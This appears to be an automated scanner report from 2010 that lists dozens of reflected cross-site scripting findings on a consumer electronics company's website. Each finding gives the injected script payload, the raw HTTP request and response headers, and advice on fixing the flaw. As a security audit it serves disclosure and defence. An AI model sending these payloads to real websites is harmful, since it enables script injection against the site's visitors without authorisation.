<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2ae0"><script>alert(1)</script>0308169f2c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/home/my-accounta2ae0"><script>alert(1)</script>0308169f2c1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f9df</script><script>alert(1)</script>e0e9712dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9f9df</script><script>alert(1)</script>e0e9712dbb2/keyboards HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9577"%3b1b0190d9c30 was submitted in the REST URL parameter 1. This input was echoed as d9577";1b0190d9c30 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usd9577"%3b1b0190d9c30/keyboards HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c129"><script>alert(1)</script>f4b930e8b2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us9c129"><script>alert(1)</script>f4b930e8b2b/keyboards HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7330</script><script>alert(1)</script>1b08174405a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboardsd7330</script><script>alert(1)</script>1b08174405a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6f7a"><script>alert(1)</script>20e3b70b73d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboardse6f7a"><script>alert(1)</script>20e3b70b73d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfe47"%3bbe3277278e0 was submitted in the REST URL parameter 1. This input was echoed as cfe47";be3277278e0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-uscfe47"%3bbe3277278e0/keyboards/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45da1"><script>alert(1)</script>e29a3318d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us45da1"><script>alert(1)</script>e29a3318d5/keyboards/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 859d9</script><script>alert(1)</script>1343509ee54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /859d9</script><script>alert(1)</script>1343509ee54/keyboards/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc766</script><script>alert(1)</script>bf44ba433db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboardsbc766</script><script>alert(1)</script>bf44ba433db/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77750"><script>alert(1)</script>c26da3d6cd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/keyboards77750"><script>alert(1)</script>c26da3d6cd1/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfa5c</script><script>alert(1)</script>85f0863b384 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dfa5c</script><script>alert(1)</script>85f0863b384/keyboards/keyboard-mice-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f184e"><script>alert(1)</script>fb81eb5a346 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usf184e"><script>alert(1)</script>fb81eb5a346/keyboards/keyboard-mice-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dade"><script>alert(1)</script>2af75ef3644 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards9dade"><script>alert(1)</script>2af75ef3644/keyboard-mice-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2693e</script><script>alert(1)</script>6b75e7d12e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards2693e</script><script>alert(1)</script>6b75e7d12e9/keyboard-mice-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 415c5</script><script>alert(1)</script>201bcd1833c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard-mice-combos415c5</script><script>alert(1)</script>201bcd1833c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb446"><script>alert(1)</script>6991ebe5a37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards/keyboard-mice-combosbb446"><script>alert(1)</script>6991ebe5a37 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53e6d"><script>alert(1)</script>30e38e149cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us53e6d"><script>alert(1)</script>30e38e149cd/keyboards/keyboard/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3928e</script><script>alert(1)</script>d707f1b518f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3928e</script><script>alert(1)</script>d707f1b518f/keyboards/keyboard/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6935"><script>alert(1)</script>380c6e97062 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/keyboardsd6935"><script>alert(1)</script>380c6e97062/keyboard/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b581</script><script>alert(1)</script>36332be86ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards3b581</script><script>alert(1)</script>36332be86ca/keyboard/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a5c9</script><script>alert(1)</script>1d94d1482df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard2a5c9</script><script>alert(1)</script>1d94d1482df/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ad1a"><script>alert(1)</script>5c45911c843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/keyboards/keyboard6ad1a"><script>alert(1)</script>5c45911c843/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db61"%3b4b7f8814280 was submitted in the REST URL parameter 1. This input was echoed as 8db61";4b7f8814280 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us8db61"%3b4b7f8814280/keyboards/keyboard/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:00:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3e6c"><script>alert(1)</script>9baf15ebd28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usd3e6c"><script>alert(1)</script>9baf15ebd28/keyboards/keyboard/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 426c7</script><script>alert(1)</script>88dbc2563d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /426c7</script><script>alert(1)</script>88dbc2563d4/keyboards/keyboard/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 842f0"><script>alert(1)</script>c85bc793110 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
